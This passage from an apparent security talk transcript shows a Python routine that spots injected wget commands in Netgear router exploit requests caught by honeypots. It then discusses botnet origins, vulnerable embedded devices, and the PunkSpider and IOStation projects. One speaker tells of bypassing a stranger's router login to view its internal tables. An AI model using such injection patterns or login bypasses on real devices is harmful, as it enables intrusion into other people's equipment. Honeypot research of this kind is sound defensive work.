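    "&curpath=/&currentsetting.htm=1"
)

# Matches the URL handed to wget inside the injected shell command.
WGET_RE = re.compile(r"wget\s+(http://[^\s;]+)")


def extract_payload(request_target):
    """Return where the injected command downloads from, or None if no match."""
    query = parse_qs(urlsplit(request_target).query)
    if query.get("next_file") != ["netgear.cfg"]:
        return None
    command = query.get("cmd", [""])[0]  # '+' is already decoded to spaces
    match = WGET_RE.search(command)
    if match is None:
        return None
    payload = urlsplit(match.group(1))
    return {
        "host": payload.hostname,
        "port": payload.port,
        "file": payload.path.rsplit("/", 1)[-1],
    }
```

Pulling out the hosting address this way is what makes it possible to compare it against the address that sent the request, which is the comparison that comes up next.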
So I started digging a little bit deeper, and I used this data to identify where the attacks were coming from and where the malware was being hosted. Interestingly, they were always different IP addresses: whatever service, or sorry, whatever computer was saying "go download and run this malware" was never the same IP address as where it was being hosted. They were mainly hosted in China, like predominantly, definitely some in India, and of course it's a botnet, so it's spread across the world, but there was a huge amount of it coming from China. That was interesting because when I looked at which sensors the botnet was hitting most, it was really heavily hitting India, Japan, Australia, and then to a slightly lesser degree Canada and Germany, but there were no hits in China, which was kind of funny. I'm not trying to suggest that this is some sort of clever state-sponsored piece of malware or anything like that. I just thought it was funny that none of my Chinese servers actually saw any of this, and it almost looks like a geopolitical map a little bit. So yeah, China's suspiciously missing there. You know, I did dig in to look at what devices were actually part of this botnet, and it definitely looked like a lot of D-Link, Netgear and Huawei gear. I saw IP cameras and DVRs; there were some GPON devices, which was a little interesting. I didn't really see anything that indicated it was part of any sort of corporate structure or anything. The software being used is a lot of web servers, but they're all the kind of small, lightweight ones that you see being used in embedded devices and things like that, like home routers. I did notice that the lighttpd version that I saw a lot of, actually 1.4.39, had just a ton of CVEs, and many of them were just like blanket remote code execution vulnerabilities and stuff, which was kind of cool. So I did kind of poke around at a few of these, seeing what they were showing, and I found this kind of cool
example. This was just somebody who was part of the botnet. It has an interface that looks a lot like D-Link. I didn't try to log in or anything like that. The links on the top made you log in, but I did dig around the JavaScript, because there really wasn't that much of it, actually, and I saw that it was crafting these links. So I went to a few of them directly, like sys-status.asp for example, and, you know, I guess it doesn't always want you to log in, so if you go to them directly, the login page actually works, or sorry, is bypassed. I was able to see all the internal DHCP tables and all the routing information and all that stuff. And you know, while this isn't some egregious vulnerability necessarily in its own right, it's just kind of illustrating that this is the kind of nonsense that is still all over the internet. Like, I know security's been a hot topic. It's getting better, I think. I think, anyway. But there's still craziness like this, where this person's router just lets you in without logging in, and yeah, that's kind of crazy to me. So, you know, we're kind of running out of time here, but I'm sure the burning question in everyone's mind is: where is this all going? So where is it going, Alex?
Right, so I just want to recap for everybody, right? So a couple of quick things. We created a hugely scalable system for fuzzing URLs. We found a bunch of vulnerabilities in major websites. We've even found zero days in popular form technology, right? So obviously the probably most important part of that is that we're releasing it out to you all, the public, and we want to keep these results updated while still continuing to go extremely broad. Our target is still the entire internet. We're not going to let up on that target. We're going to continue engineering until we've reached that target and we can keep the records reasonably updated to a certain degree, right? So how can you help us, right? I mentioned throwing us ideas; obviously that's really helpful. But download that extension, use that CLI tool, start calling out websites. All of these things are really helpful, not only to PunkSpider but to the mission of PunkSpider. Really, we built this for you all, so don't forget to use it, basically. That's all. As far as IOStation is concerned, you know, I think that continuing to transform my mindset from pure cybersecurity to evaluating risk and risk scoring is really interesting, so I want to continue going down that path. That's not to say that there won't still be the broad internet collection tools that I've been working with and know and love, but some of the newer features that are coming out probably will be geared towards that, especially when it comes to critical infrastructure and industrial control systems, which, as anyone paying attention to the news lately I'm sure knows, has been a bit of a hot-button topic when it comes to certain pipelines which may not be named. But I think that's a really fascinating area, and one that's obviously increasing in importance. I know there are a lot of utilities and things that have really ignored their cybersecurity posture, and they're starting to get bit by it, and anyways, that's
something I think we need to look at. The other one is a little bit more vague, but it's really trying to identify attacker infrastructure. Like, are there things that we can observe from the outside to identify what an attacker is using and how they're organizing, maybe early on, at the onset or whatever? As early as possible is obviously better. Is there software that can be probed and identified running across the internet? Are there any particular techniques or patterns or signatures or anything like that that we can extract? This one is not as well thought out, obviously; it's just something that I think we're pretty interested in tracking down long term. But I think that about wraps it up for us. So yeah, if you wanna shoot us an email or whatever, feel free. You can visit our office, but Alex and I won't be there. So yeah, thanks everybody for coming and listening to our talk. We really appreciate it, and thank you all for taking the time to listen to us ramble on about this system. I hope you really enjoyed it. Yeah, thanks everyone, take it easy. Peace everybody, later.